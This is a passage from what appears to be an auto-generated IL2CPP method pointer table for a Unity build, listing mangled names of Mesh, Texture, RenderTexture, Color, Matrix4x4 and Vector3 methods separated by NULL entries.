Mesh_set_uv2_m37B442C04EBB029C0AD9545C54F95D9BDAD8E9B5,
Mesh_get_colors32_mA230CB5687CDCCEA5527BD5A0640E9535CB640A2,
Mesh_set_colors32_m0E4462B7A1D613E6FB15DD7584BCE5491C17820F,
Mesh_SetVertices_mCE01139EEEC3D10B4A6CEA1749FD84DABC53599E,
Mesh_SetVertices_m193FDA5D9CB31FDFEEEC4CF17C0524A255E74E2F,
Mesh_SetVertices_m13AB485BDB6B8F740338B20075A3E1510A6F96FA,
NULL,
NULL,
NULL,
Mesh_SetNormals_mB4072A4D2600768FD62BC9CAAFF8C43955A4A365,
Mesh_SetNormals_m7EB9E43C0287E99F2140901EB9CE5A75728B1C29,
Mesh_SetNormals_m07608D2B5CA012B8B3502868EF6D4B4DF859DE51,
NULL,
NULL,
NULL,
Mesh_SetTangents_m0FAEBB1D9ACF3607640669AD70AD6BFACA9D3CBB,
Mesh_SetTangents_mAE30C8D38845CEC4002FE0938607CDE0D2358FBE,
Mesh_SetTangents_m87066124EB0091440267546DB9A27EC89BF6E21B,
Mesh_SetColors_m4D4920186213CCC1DA28CD3C7BDBD13F0D00541F,
Mesh_SetColors_mEF64AD954EACB5F5EFFD8DA6AEA7D80CD1233F37,
Mesh_SetColors_m07FAA75430500D2B2384A4A8185311411C504DEA,
NULL,
Mesh_SetUVs_m5A7A6EC14A621579B7138F2EF9BECA60E880A8D7,
Mesh_SetUVs_mA0EA40129409D956FF22FCF7E01E27382879E255,
Mesh_SetUVs_m974B79ED0ABDD6F9F14588E7D2BF5C637044656A,
Mesh_SetUVs_mDA2109E69AB4210A3DA3A3EA0DE9F77F0C9A8040,
Mesh_SetUVs_m69E3F4333E212B3CAA0EDFFF14A2835897079D35,
Mesh_SetUVs_m25164DB799B915ECE8AE94B4A1F844CE936844B9,
NULL,
NULL,
NULL,
NULL,
Mesh_GetUVs_m3FCD854132DA16719481B8D97DF335A0C7244344,
Mesh_PrintErrorCantAccessIndices_mC2A8F7BBED09D4D6ABC265AFCC2979795C1ABF0C,
Mesh_CheckCanAccessSubmesh_m216B541BBC526DB8F0ADBC9210E440D6DF875283,
Mesh_CheckCanAccessSubmeshTriangles_m96B4AFC9B20344F39C936698D23FBA1DACCBA020,
Mesh_CheckCanAccessSubmeshIndices_mB6659E6FDE4EFDECB233C194E4AC066F5FF60533,
Mesh_set_triangles_m124405320579A8D92711BB5A124644963A26F60B,
Mesh_GetIndices_m112B85EF32EE3C446947CE6CBC1AF3D50FC18179,
Mesh_GetIndices_mFF08708714AB105E1097F1C2065D2A1ACAC88183,
Mesh_CheckIndicesArrayRange_m0B8030BE6248E1E411D92E3255777E6E530527F4,
Mesh_SetTrianglesImpl_m0B0B6FAC63A88C640C3AA9DD5F1748BE6B2A2EC2,
Mesh_SetTriangles_mD495DA0B00DB0E60A2B7B500D644F4470C1D61DB,
Mesh_SetTriangles_m7CED6F00BCE254F7F0D7AFEEDBBE2F7E637F678B,
Mesh_SetTriangles_mD3AB650CCB405159EFDB9EC36AB21FF20213BFFB,
Mesh_SetTriangles_m0E33B0C08C74A076A4B79F031DA60629B6CD86BA,
Mesh_SetIndices_m2AE7ED76A6C77D218C37C011DDB948589FD45B97,
Mesh_SetIndices_mDEC5E818B31E1DDA51EC563C78918068EE5D1B95,
Mesh_SetIndices_m21AD9D32E3FDC67959D8AB75A91078AA5DA952F7,
NULL,
NULL,
Mesh_Clear_m0F95397EA143D31AD0B4D332E8C6FA25A7957BC0,
Mesh_RecalculateBounds_mA9B293F57C6CD298AE2D2DB19061FC23B05AB90B,
Mesh_RecalculateNormals_m3AA2788914611444E030CA310E03E3CFE683902B,
Mesh_RecalculateBounds_mCCC67392C58860F92A9674D0816BCA2D1730F077,
Mesh_RecalculateNormals_m3ACA6ECD9C48FE1C7BA497EB23519DD4EC21DCED,
Mesh_MarkDynamic_m718089940F240AFE625D6DC9DA4E6F20229CC322,
Mesh_get_bounds_Injected_mE40C051E4181E7F70DB928CEA13A3A31DC9C29F7,
Mesh_set_bounds_Injected_m13D417C394E27CE4A14DF253F8DD435677FC2835,
Texture__ctor_mC0C7974BEBD867CEB281409FEA15A78CD91B19CC,
Texture_GetDataWidth_m9D5166D12895E4E905ED072D611DF6A834C232BC,
Texture_GetDataHeight_m37C3DE842FB101FD509904A0D76593F970B34995,
Texture_get_width_m9569A27BA478BC380EBF83A53429F0E66E429108,
Texture_set_width_m309DEA6AA9203B160624755C5D9EA75AB08AD6AE,
Texture_get_height_mE95D093681C11FD77191F51843F6615605A87258,
Texture_set_height_m2A62EC27DC1F0AE6A952B2B65FF7BF68710CDF36,
Texture_get_isReadable_m6268EDAFF304287D8754EC0F115377722A316139,
Texture_get_wrapMode_m1DE1C2813B72EDCCCEB396CFC91989358E8C3AD0,
Texture_set_wrapMode_m1F74A690E3883EC9C5C371D502D09642F15D0F7E,
Texture_get_filterMode_mFEF0AEA29E8468450EF85533965DCEBE66D02A45,
Texture_set_filterMode_mE423E58C0C16D059EA62BA87AD70F44AEA50CCC9,
Texture_get_texelSize_m05CA60DE53EF7CD5D2CBFA68B69B764E4D463359,
Texture_Internal_GetActiveTextureColorSpace_m2F9F2D07316E0B52679BA943369AFBF7C292949B,
Texture_get_activeTextureColorSpace_m286856BA92961FD58FE181C8DDC417EC0572643C,
Texture_ValidateFormat_m5E00A267F1E4805EFCE6F6ACE707518221589596,
Texture_ValidateFormat_m1BC113E81713CBAF60BCA4D022ACC0C6B239E740,
Texture_CreateNonReadableException_m29786CD930E89C281564A9B341FD4088FBC8C94F,
Texture__cctor_m58E82606B5D16BB7EEEC4BFAD112C1B1F95100FE,
Texture_get_texelSize_Injected_m9AD407D56C4BDA37E028DAEDC0D787332BCFDD18,
Texture2D_get_format_mE39DD922F83CA1097383309278BB6F20636A7D9D,
Texture2D_get_whiteTexture_m7999084E0B635CF834F8DD2D840FAA71720404DA,
Texture2D_Internal_CreateImpl_m24B85EC48FF8951247911008AE5AF27305970AD9,
Texture2D_Internal_Create_mD2E459ED24618FAE9C372D6B3A0D18A8E4633C51,
Texture2D_get_isReadable_m61A2BCE2B901DF11A910F5F8E93A72D4FD091B84,
Texture2D_ApplyImpl_mF4AA09D491BDA81E4A3B3BA21157436CFEC39DAA,
Texture2D_ReinitializeImpl_m4C524C33B85EDD5FD09CAF2FA2F922FFA8BE366C,
Texture2D_SetPixelImpl_m9B08AB57ACD44485ECC3728BD3DE39F5E80A64AA,
Texture2D_GetPixelBilinearImpl_m1BD6DEFD90A950A3A1A235ED641F4B20F5433C8B,
Texture2D_ReinitializeWithFormatImpl_mF71459B3B010311D7BE7FA76611F56323107D327,
Texture2D_GetWritableImageData_m8E26026A332040F8713E5A2A13C5545797159A5E,
Texture2D_GetRawImageDataSize_m690AA2A7E6B0A207BC6DCA00A6313C3407CE3418,
Texture2D_UpdateExternalTexture_m73D80FDE0859F0E36D320A69317E04A3A2AD9986,
Texture2D_SetAllPixels32_m3B35E8F24EAE2368148524647EA47BC731A7A07A,
Texture2D_ValidateFormat_mD70A9FEEADE89325F05E3650404D8815EE9871F4,
Texture2D__ctor_m20EA968E1968A169CC798DB95BC7FA1634F422B5,
Texture2D__ctor_mB1445796B2A76B3D867B2603205F513AF494B9F3,
Texture2D__ctor_mECF60A9EC0638EC353C02C8E99B6B465D23BE917,
Texture2D__ctor_m3BA82E87442B7F69E118477069AE11101B9DF796,
Texture2D_CreateExternalTexture_mE565291082917E99C26424734E284C00F295490B,
Texture2D_SetPixel_m2CCFC5F729135D59DC4A697C2605A3FC5C8574DB,
Texture2D_GetPixelBilinear_m6AE4AF4FD181C478DF0F2C5C329F22A263ABFF5C,
NULL,
Texture2D_Apply_m36EE27E6F1BF7FB8C70A1D749DC4EE249810AA3A,
Texture2D_Apply_mA014182C9EE0BBF6EEE3B286854F29E50EB972DC,
Texture2D_Reinitialize_m9AB4169DA359C18BB4102F8E00C4321B53714E6B,
Texture2D_Reinitialize_mE7FBFD2EEF3BE3135269959DBBE253A2B79A82DF,
Texture2D_Resize_m6A784927A609BAE045AFCF77886AEEE72D19FB90,
Texture2D_Resize_m80C2555F96D9952F9C3B57C53B231A64F3DBA605,
Texture2D_SetPixels32_m436DA034F0483F6527B7C4B74744A02ABE2EA276,
Texture2D_SetPixels32_m169F9873A21FB8DECA24DC1B8F06FB23D13BEE2A,
Texture2D_SetPixelImpl_Injected_m6B877CD888C30B122813AB3FDB853E336DBCBDE0,
Texture2D_GetPixelBilinearImpl_Injected_m609C33C58A1944B31C61309F71B459DA3AD99F07,
Cubemap_Internal_CreateImpl_m18A09A1641EA5C3C36C8F26C57AE09BF0AE7BFAA,
Cubemap_Internal_Create_m43796004F7479E41B1C400786370A8D2C501FA6E,
Cubemap_UpdateExternalTexture_m6065B8D7B4B70C31AAA64DD142B96ADFAD74C53E,
Cubemap_get_isReadable_m66D87D825AE04E10C23B74E93E0111E87AF7478C,
Cubemap_ValidateFormat_m60822B130F11C0593CF08E9C6145277C30EF0394,
Cubemap_ValidateFormat_m73C8D32EC70CA5CFB8AF951C1E4D8C92A757ACDD,
Cubemap__ctor_m3359CE12114733CB661B308AB0F73F65B14F4758,
Cubemap__ctor_m3821285A2DC0E20113E2BEAE3F16C9AF925FE14B,
Cubemap__ctor_m4C0C7AD2F162CF6D98856430F3C2A41CE57123E5,
Cubemap__ctor_m395695939CC8AE11ABC2EBEE0731AA09B9780DB3,
Cubemap__ctor_mB83680A805288E50B7D0715A94CBF24495E240F7,
Cubemap__ctor_mD5E735B11F069D78C5AF0BE1DD36291A8F49785A,
Cubemap__ctor_m7FAD821CFD73DA99987C1FEBA363BB2FBF84C034,
Cubemap_CreateExternalTexture_mF319F476EA734482687F9807DCDEFE8A5D92CB25,
Cubemap_ValidateIsNotCrunched_m997EEF21323A149D2CE892BB9DA91B228B0CA581,
Texture3D_get_isReadable_mC8D0F22C0C3C9524FE31A0E3A70A27233AAF1031,
Texture3D_Internal_CreateImpl_mD29CBC93948BE3645FC65183337D852A25B90DDC,
Texture3D_Internal_Create_m5A9B7F106F9F2D3693DD060EEEE45C8C528C0F2F,
Texture3D_UpdateExternalTexture_mDF4E8A634EC749B99E5AC5616F776BF42188A607,
Texture3D__ctor_mBF5766666A0CAAE44719627620B2BA7F99A14054,
Texture3D__ctor_mA853CA41A85C285281FB928BC926B0798987B17F,
Texture3D__ctor_m2814019477DFC8BAD31E7C3CEEEBB693DC26A67E,
Texture3D__ctor_mFAEE4FD4E1E5A8093603E8C08F3909DDEDD41EFB,
Texture3D__ctor_mD7476DE7FCF3F8811FD94C81CD51AD5A8AF2CD34,
Texture3D__ctor_m0026373ADF87B100336F82579802E7819A5DB0F2,
Texture3D__ctor_mD27F46A8B13B79866370D54112CB569B104886A2,
Texture3D_CreateExternalTexture_mBF7F63C80D482DF8102B40015579D457FEC8817B,
Texture3D_ValidateIsNotCrunched_m82F76B28D3BCD7A6E43D1E15D31FF3C23C8AD3B2,
Texture2DArray_get_allSlices_m1F5B5A3B87999EF6512EA976A810E777D042860E,
Texture2DArray_get_isReadable_m1C8E2BAFBA65C894DAC0F30C9FC685173B879C32,
Texture2DArray_Internal_CreateImpl_m00EA6E728CE6ECCEBEC2F29132CF5B059E1F9E7D,
Texture2DArray_Internal_Create_m2AE47A76D61B8F73E40AFAE98DCC119E03683A29,
Texture2DArray_ValidateFormat_mBE783ADB196C4C046E69C370387E0CAFB5B26A25,
Texture2DArray_ValidateFormat_m2155230AF829C3BD0B76D886B9D83A74F9994921,
Texture2DArray__ctor_mE60F3475E1987C78E2055BFDB60394D9CBDEA395,
Texture2DArray__ctor_m465591352202E3D5CAF529F8CB094FB2E52C6EA0,
Texture2DArray__ctor_m6EA4D33D0E4804BD374D86BDE37A5F7F860200C4,
Texture2DArray__ctor_m7C3429ECA397399F19C750F842573B920C6CAF78,
Texture2DArray__ctor_m815CEB6ACC6C586A3D696AFA09D78C5B1957F9C0,
Texture2DArray__ctor_m02B575835C1D88384829865AAC5A30228AB9C12C,
Texture2DArray_ValidateIsNotCrunched_m4F9EADC3BD464AFC7F8B823A4105D5FB3C5BB2D3,
CubemapArray_get_isReadable_m316414972F31FD8FA45F78EB2A41585E886CA868,
CubemapArray_Internal_CreateImpl_mCEBD03EDBA0965992C656BFB39E033EC0FA82361,
CubemapArray_Internal_Create_m5F3576FC64B64242CE813C9345C3AD7E9AFF83CD,
CubemapArray__ctor_m540A30E402A99397CC4A65A38954283C69FB9B75,
CubemapArray__ctor_mD255863D4BD2CC18AF0065CAB121609A82019676,
CubemapArray__ctor_m0C70134AD214861C2B196A31E5F5156B56CEBF7D,
CubemapArray__ctor_m1DB13F0A5997B95E8E30369997CEF9268496881F,
CubemapArray__ctor_m8F5B690A043EB48E7996148A50F243BF5FE3D65E,
CubemapArray__ctor_mF817A910C4140CA704BEA27D6111D1BAFD07E7F1,
CubemapArray_ValidateIsNotCrunched_m394935252E32993B8E273689FAC21234257A2F73,
RenderTexture_get_width_m1B8A7D17591897EFAA8C841795A9BD15EA5C7B31,
RenderTexture_set_width_mDCDF28DB4E7CC398E5EA31B7A8B39B0D34D7FAB1,
RenderTexture_get_height_m9695AE75401A1D89227C6827843F4ADF4A3EAD74,
RenderTexture_set_height_m04F8A4678F13855D357AA3458097DF1FD6D5BDEE,
RenderTexture_set_graphicsFormat_m4CFDFF4CEC81B5350AE94D466585C8186E06B733,
RenderTexture_set_depthStencilFormat_mCEED5DA45F9F19CD67D960D896400E85B1211855,
RenderTexture_GetActive_m6F725FD195023A77D29B948FC3B7D813F5DF06C1,
RenderTexture_SetActive_mED4F14FE8DA350D742C47254DA9A93BEA35533D6,
RenderTexture_get_active_m2204DF860773F9A8CDFF92BDB35CEB72A0643345,
RenderTexture_set_active_m045EA53D62FBF79693265E33D14D8E0E8151A37E,
RenderTexture_GetColorBuffer_mDCF981FDA18342C7D239932B7105CA0DB1798E4A,
RenderTexture_GetDepthBuffer_mA3CA39776C8174D199AD26E868B3EB720C6B801B,
RenderTexture_SetMipMapCount_m037EE54855938389E781C6CFA5A398641BC7CB83,
RenderTexture_get_colorBuffer_mE043AF01C1B2FB73BDC9C82D78528A367089CDE0,
RenderTexture_get_depthBuffer_mBBDFA14B3AC2AE4796795E89A0BCA59D54B859D5,
RenderTexture_SetSRGBReadWrite_mBE116D34F4B919AC7E48814ABC9D623A9FE518C0,
RenderTexture_Internal_Create_m9AEDC02BF516D449A0F35D379D3E8E220A7FEE51,
RenderTexture_SetRenderTextureDescriptor_m498C0757E95407077AF11B034319DF7AC904BA18,
RenderTexture_GetDescriptor_mB180407D5E1215BF1651A913AC146D25EAE9C6BC,
RenderTexture_GetTemporary_Internal_m693D7407D1D928E322B0BA5FF82B8D73785F3667,
RenderTexture_ReleaseTemporary_m7D9B385460ED0D0CF7BCC033605CEBD60A1A232F,
RenderTexture__ctor_m731283139A246174F3F33B37991F9BFFBD29293D,
RenderTexture__ctor_m1CBDB7F13C2CE49A31EE654081F01C4F874EA5E3,
RenderTexture__ctor_mF6FCD7FA9976CC646BDF8715157EA198A992E75B,
RenderTexture__ctor_m69A0AF5C6CCFFFB58D9F5A0C975D0272CA66684B,
RenderTexture__ctor_m0C81127DE754F64FDD3E80E94BE11054B2791F98,
RenderTexture__ctor_m583FCACDD5FCA4102329911331B6DC51660795F0,
RenderTexture__ctor_m0F1316F315E35B4E305FE929604E8F489189C39D,
RenderTexture__ctor_mD60FB2D8D9560774F2E21BAC0A0061CB17904EA3,
RenderTexture__ctor_m68A1B9CAA1BE0B597C5F4895C296E21502D0C962,
RenderTexture__ctor_m53215A8EDDE262932758186108347685F6A512C4,
RenderTexture__ctor_m45EACC89DDF408948889586516B3CA7AA8B73BFA,
RenderTexture__ctor_m7E177DB2DEF7CD2EEB812EEB262081E923BEF2AC,
RenderTexture_Initialize_m924B8245CB23DF4FECCF5A68B158A393DC0401D0,
RenderTexture_GetDepthStencilFormatLegacy_mAD2A6254B0A8970AF22A5306A35CE6993E0C597B,
RenderTexture_get_descriptor_m2FABD5CF6CCF410D1311FCBC7C9D9ECDEE9C7CC2,
RenderTexture_ValidateRenderTextureDesc_m8D6636ECF3C97BC7C5E2504C1E355C4696A92B3C,
RenderTexture_GetCompatibleFormat_m09EDE465FBF7B691B3BC8510C16461738E4EE8C1,
RenderTexture_GetTemporary_m67446280ADE53A43FC26C671AFE7FE6912888CB5,
RenderTexture_GetTemporaryImpl_m8CB5433ECBBA6C7FB7BBAC13CAA26EDE67242C66,
RenderTexture_GetTemporary_mEB21705B78CAF6B8F1F6617453A8EE8A94498DE2,
RenderTexture_GetColorBuffer_Injected_m1AC1564038AB3F39ECFDB8C98AC573F4803BEE68,
RenderTexture_GetDepthBuffer_Injected_m5EA9252E3F0DFAEDE76303614E7683CC549B05F4,
RenderTexture_SetRenderTextureDescriptor_Injected_m92390C2D26840E69E7B8F3DF5DA44FCB078F363F,
RenderTexture_GetDescriptor_Injected_m37E30C68CAB7F283BDD1FA2F580066C4BA80A085,
RenderTexture_GetTemporary_Internal_Injected_mD45A6A56D7280A557FF7199CD66CDEDFD3FC3D2A,
RenderTextureDescriptor_get_width_mB159E4EB08B23B19CCCFADB465864361FB840BFF,
RenderTextureDescriptor_set_width_m3B2494007BFE3AD4D14403407C9B24F5045E7E10,
RenderTextureDescriptor_get_height_m1006F9AA45029715C552C8A8C2F102F63D3A91EC,
RenderTextureDescriptor_set_height_m1FE41111472DAA9B5E80FFAF3445004D72A3CFA5,
RenderTextureDescriptor_get_msaaSamples_mFCC33643AFF2265C8305DCFD79ED8774A1A8FA22,
RenderTextureDescriptor_set_msaaSamples_m6910E09489372746391B14FBAF59A7237539D6C4,
RenderTextureDescriptor_get_volumeDepth_m528818299E101F1B285B08BE12FAC2F9A871BA36,
RenderTextureDescriptor_set_volumeDepth_mEF9610D1C14182417A01B7243DEE6B559A13B34D,
RenderTextureDescriptor_set_mipCount_mDCC85ED7D97BD64A290A21DB91BC5CB1C4BA95EF,
RenderTextureDescriptor_get_graphicsFormat_m50F25A4F179EA318C8D3B0D8685F9C5F59F7DEC0,
RenderTextureDescriptor_set_graphicsFormat_m037DA25F9A8B956D830C7B7E5C6E258DC1133A13,
RenderTextureDescriptor_get_depthStencilFormat_m360929BE5BD10E9C3D8C936AA6B44B1D11C119CB,
RenderTextureDescriptor_set_depthStencilFormat_m7EC335006743B59AAD1895AD06B2DD74333F9A03,
RenderTextureDescriptor_get_depthBufferBits_mC095E36F9803B2E68E258C03E48ACD0B0E678953,
RenderTextureDescriptor_set_depthBufferBits_mA3710C0D6E485BA6465B328CD8B1954F0E4C5819,
RenderTextureDescriptor_set_dimension_mCE9A4A08454BB2D9DFE3E505EC336FD480078F39,
RenderTextureDescriptor_set_shadowSamplingMode_m4B4CE918DFFF1CC5E3AF981456E186F15FC5DB93,
RenderTextureDescriptor_set_vrUsage_m994CB3D4B250A70BE005D9FDFD24D868E07A52F0,
RenderTextureDescriptor_set_memoryless_m9ECE149930C0E2629A5CD9DA1CD0EA2A01FFE1B2,
RenderTextureDescriptor__ctor_m8B0D32DC550540B5546891C2F6300F384D6FE692,
RenderTextureDescriptor__ctor_m8F8897C63F614AEA4348A95293C911C1293DA3A4,
RenderTextureDescriptor_SetOrClearRenderTextureCreationFlag_m4C08C7A3F715426EBECA2B983361908D097C6424,
RenderTextureDescriptor_set_createdFromScript_mEE28DED1D3C20DA025A0C44E1C2A531685194F23,
RenderTextureDescriptor_set_useDynamicScale_m9335866C8754D51235D391E84F8972C4C518844A,
Cursor_SetCursor_m04453993587B6E24034859C1B4FF36423BC493EE,
Cursor_get_lockState_m99E97A23A051AA1167B9C49C3F6E8244E74531AE,
Cursor_SetCursor_Injected_m8125D93C00203B82AB835E843DF4CCFE3D1B35DD,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
Logger__ctor_m3155E21A68AA616431A260A3FCBB4B074DF6FAA2,
Logger_get_logHandler_m4FAA2028695BD9FBA134E836AD52480984E82215,
Logger_set_logHandler_mD2A80ADC7D4155C91B68EAE1FDBD7ECBF6DB49D3,
Logger_get_logEnabled_m0A868820FAADBF477B46963F5050AFCBBC46AF0B,
Logger_set_logEnabled_m3FBDDB7D1C5D9854C0F32ED6F7AB0348F286F52E,
Logger_get_filterLogType_mCE9711AF596B77EAD158590247FA5FC855F54A54,
Logger_set_filterLogType_m8EF119582F4975FE3D297EE71F9D3E1CFEA7AB74,
Logger_IsLogTypeAllowed_mFE76B00210BF4431747A69A28A15EE2BF1A0D586,
Logger_GetString_mA45CFEFEB29D9F804C091BAC5F098CB7B3B6ADD7,
Logger_Log_mEA3D39763D610E92491AA479BA653ECFEE3E9E5C,
Logger_Log_mF8C7E8A8CC31E04732044D73D2CB551D7CCB8995,
Logger_LogError_m4612980842D15256036F4EB16BADF13FD49F38F5,
Logger_LogException_m591AF39F0886DA44666068EDBBD3CCF07623CFBB,
Logger_LogFormat_m5A31966B8AA13AC1FFEC1DED42F56FA966459093,
Logger_LogFormat_m776A546E755F914039AB8591E23D08510308DB4C,
UnityLogWriter_WriteStringToUnityLog_m03DF7718BD577F83C1990431ACEF20AA204A9BAA,
UnityLogWriter_WriteStringToUnityLogImpl_m3C3AF5334546A58772F28CB81059D26BFC50DC26,
UnityLogWriter_Init_mAA89EF0A02E3F6D2034522F8462DEC0A9D26C467,
UnityLogWriter_Write_m84C3CC2A39BCB227569A7CA862364347ED6D577B,
UnityLogWriter_Write_m0B8D2EBA5EE6845949F89ADEEC46770E14BD2EA5,
UnityLogWriter_Write_mAF2FA56268554F3AA26CBA5754F0A4BB951BC61F,
UnityLogWriter__ctor_mEAC134C82FDBE3621F92519D6C163505BEFF6823,
Color__ctor_m3786F0D6E510D9CFA544523A955870BD2A514C8C,
Color__ctor_mCD6889CDE39F18704CD6EA8E2EFBFA48BA3E13B0,
Color_ToString_m0018DE2184B3377CCA6FBD72D5D47886DC669147,
Color_ToString_mC29251805A0B629C1483DAE7A5BBAAC722B319D2,
Color_ToString_m70AEF3634C556F6AA01FC3236226C3D27C277229,
Color_GetHashCode_m2981EEA1DEFE55254945D7D03BE64D4F56BA58D0,
Color_Equals_m24E409BF329F25774C6577F18EFD3DE1253684D6,
Color_Equals_mD297CAFFEBE9352C940873862FDF9A28F1F02435,
Color_op_Addition_m39AF1619A5E6C1F698EEF20FA5FE6F3288902AAB,
Color_op_Multiply_mF17D278EB0ABC9AEB32E829D5CA98784E0D6B66F,
Color_op_Multiply_m290BA7F5157DE3322801AAC7FA1700219EE6E664,
Color_op_Equality_m3A255F888F9300ABB36ED2BC0640CFFDAAEFED2F,
Color_op_Inequality_m4A31CEDC6B46367D219D0358AC94F5F66C3849CA,
Color_Lerp_mCE0CF50E59713C5A8F6AAC2C6648CF0EDBEEB27B,
Color_LerpUnclamped_mF9C5CB32C3A014F975624AD08C96FE237DC26295,
Color_RGBMultiplied_m4B3BAE4310EA98451D608E0300331012AFFF1B01,
Color_get_red_m27D04C1E5FE794AD933B7B9364F3D34B9EA25109,
Color_get_green_m336EB73DD4A5B11B7F405CF4BC7F37A466FB4FF7,
Color_get_blue_m0D04554379CB8606EF48E3091CDC3098B81DD86D,
Color_get_white_m28BB6E19F27D4EE6858D3021A44F62BC74E20C43,
Color_get_black_mBF96B603B41BED9BAFAA10CE8D946D24260F9729,
Color_get_yellow_m1EF7276EF58050DFBA8921E2383F0249C08D346F,
Color_get_cyan_m1257FED4776F2A33BD7250357D024B3FA3E592EB,
Color_get_magenta_mF552F660CB0E42F18558AD59D516EBAC923F57E2,
Color_get_gray_mC62F535A52768B992F144E443D201F749C5DE932,
Color_get_grey_mBCECB7841257253597D826AB06E678DA43CC4298,
Color_get_clear_m8B58EA88C92F7DD2C66F0EC1BCC8AC697D631298,
Color_get_linear_m76EB88E15DA4E00D615DF33D1CEE51092683117C,
Color_get_maxColorComponent_m97D2940D48767ACC21D76F8CCEAD6898B722529C,
Color_op_Implicit_m6D1353534AD23E43DFD104850D55C469CFCEF340,
Color_op_Implicit_m04FFC6EBCB0576CD59529546F8FA10F4F71E9005,
Color32__ctor_mC9C6B443F0C7CA3F8B174158B2AF6F05E18EAC4E,
Color32_op_Implicit_m7EFA0B83AD1AE15567E9BC2FA2B8E66D3BFE1395,
Color32_op_Implicit_m203A634DBB77053C9400C68065CA29529103D172,
Color32_ToString_mB1EFBF981F901A76ABF2FEA19EB290A2D8CAFC32,
Color32_ToString_m263D34787852D176627FC2B910DFE9CABAF26696,
Gradient_Init_m9F60BAFFC0C5DDC087C0CB0EA64F62A38D4DCD6A,
Gradient_Cleanup_m852D91204DE7A67197754BC5EEF35BBC340795E9,
Gradient_Internal_Equals_m8499EFC381172FFC827366BE219C9CDA8A444D0C,
Gradient__ctor_m5EC470BB063D4831774C7CDA5D471EBEB5CE7B54,
Gradient_Finalize_m69475357E7933E7692476BB6B8952E06EC4F23CC,
Gradient_Equals_m3CA73EEE2426924D75D835A69F00B9EB50D44294,
Gradient_Equals_m77211B56445AB40DEF32AE890BD6B13E2410FB98,
Gradient_GetHashCode_m031DD1B99829405A1654F69EC63CFF929139C94C,
Matrix4x4_GetLossyScale_m3C19D2C6746BB211C8CB02478A60EB2D71D10FC7,
Matrix4x4_get_lossyScale_mFB3D4CF6408D710D607CA1D2AF94B2E4E0B57EB7,
Matrix4x4_TRS_mFEBA6926DB0044B96EF0CE98F30FEE7596820680,
Matrix4x4_Inverse3DAffine_m12F1B34AA8BCEB2C3D72481C02064363B9202A0C,
Matrix4x4_Inverse_m4ED4E9DA31C914B4CFAFCB370A34C1AFE3C3AA2E,
Matrix4x4_get_inverse_m4F4A881CD789281EA90EB68CFD39F36C8A81E6BD,
Matrix4x4_Perspective_mC8EE39379287917634B001BBA926CAFBB4B343BB,
Matrix4x4__ctor_m6523044D700F15EC6BCD183633A329EE56AA8C99,
Matrix4x4_get_Item_mE4D45E661CAD3C54A02156B25F5D10585F250227,
Matrix4x4_get_Item_m771C2EE3A3BFFBAC9F2AD07FFCAAF6146C1BE92A,
Matrix4x4_GetHashCode_m313B1AF4FEA792BB7E4D1D239EBE3257F825914D,
Matrix4x4_Equals_m35CFC5F304BB40EFFE011B92AA87B77CD8FF8F74,
Matrix4x4_Equals_mDB0C4CCC58BE3E108F1A40BE8DBDCD62E284CC51,
Matrix4x4_op_Multiply_m7649669D493400913FF60AFB04B1C19F14E0FDB0,
Matrix4x4_op_Equality_mB6119C9802D535FE6221A40760472D06D8438B20,
Matrix4x4_GetColumn_m5CE079D7A69DE70E3144BADD20A1651C73A8D118,
Matrix4x4_GetRow_m59C6981300C6F6927BEA17C5D095B2AD29629E9F,
Matrix4x4_MultiplyPoint_m20E910B65693559BFDE99382472D8DD02C862E7E,
Matrix4x4_MultiplyPoint3x4_mACCBD70AFA82C63DA88555780B7B6B01281AB814,
Matrix4x4_MultiplyVector_mFD12F86A473E90BBB0002149ABA3917B2A518937,
Matrix4x4_Translate_m95D44EDD1A9856DD11C639692E47B7A35EF745E2,
Matrix4x4_Rotate_mE2C31B51EEC282F2969B9C2BE24BD73E312807E8,
Matrix4x4_get_identity_m94A09872C449C26863FF10D0FDF87842D91BECD6,
Matrix4x4_ToString_mB310BE20B7CDE8AEA91D84FCA4E75BCACF7DFC86,
Matrix4x4_ToString_m33E7675EAEB7F6E9DA08C49185B92063D967C7A2,
Matrix4x4_ToString_mB8E1EFF14A37605ABA321708CC36021FFBCF84CF,
Matrix4x4__cctor_mC8CCD92F7684B074A1457FADB8F271447FDCC93E,
Matrix4x4_GetLossyScale_Injected_mA50B5DB5D02D684235C4F58107CC1BBCBBFDCED4,
Matrix4x4_TRS_Injected_mDE0AD3BD9A300FF0E7A1FC251413EFAEBC54D584,
Matrix4x4_Inverse3DAffine_Injected_mC3DA8815FCDFAC684781598274FAAB54F50DDE48,
Matrix4x4_Inverse_Injected_mDFE02F04FE907C8BC49CAF9F17631EE4228CFD59,
Matrix4x4_Perspective_Injected_m159D92D81C8E7787E8FF8B7598DDC817FBB1AE61,
Vector3_Slerp_mBA32C7EAC64C56C7D68480549FA9A892FA5C1728,
Vector3_Lerp_m57EE8D709A93B2B0FF8D499FA2947B1D61CB1FD6,
Vector3_LerpUnclamped_mFEA59FB5EB455F28D302887090F5D223277686E0,
Vector3_MoveTowards_m3E2E4E94093F49D09DEB34CA97BF8A632B27F1AD,
Vector3_SmoothDamp_mA20AB2E3DFAE680D742E9A17D969AF8A3E849711,
Vector3_get_Item_m163510BFC2F7BFAD1B601DC9F3606B799CF199F2,
Vector3_set_Item_m79136861DEC5862CE7EC20AB3B0EF10A3957CEC3,
Vector3__ctor_m376936E6B999EF1ECBE57D990A386303E2283DE0,
Vector3__ctor_m5F87930F9B0828E5652E2D9D01ED907C01122C86,
Vector3_Scale_mE0DC2C1B7902271788591F17DBE7F7F72EC37283,
Vector3_Cross_m77F64620D73934C56BEE37A64016DBDCB9D21DB8,
Vector3_GetHashCode_mB08429DC931A85BD29CE11B9ABC77DE7E0E46327,
Vector3_Equals_mB4BE43D5986864F5C22B919F2957E0309F10E3B4,
Vector3_Equals_mEDEAF86793D229455BBF9BA5B30DDF438D6CABC1,
Vector3_Reflect_mF9DE7C28D937AB29E01378DFACF8AF6FBD9FD72C,
Vector3_Normalize_m6120F119433C5B60BBB28731D3D4A0DA50A84DDD,
Vector3_Normalize_mC749B887A4C74BA0A2E13E6377F17CCAEB0AADA8,
Vector3_get_normalized_m736BBF65D5CDA7A18414370D15B4DFCC1E466F07,
Vector3_Dot_m4688A1A524306675DBDB1E6D483F35E85E3CE6D8,
Vector3_Project_m47BC1C674D5732D50B6E136626FB2C53E18A706E,
Vector3_ProjectOnPlane_mCAFA9F9416EA4740DCA8757B6E52260BF536770A,
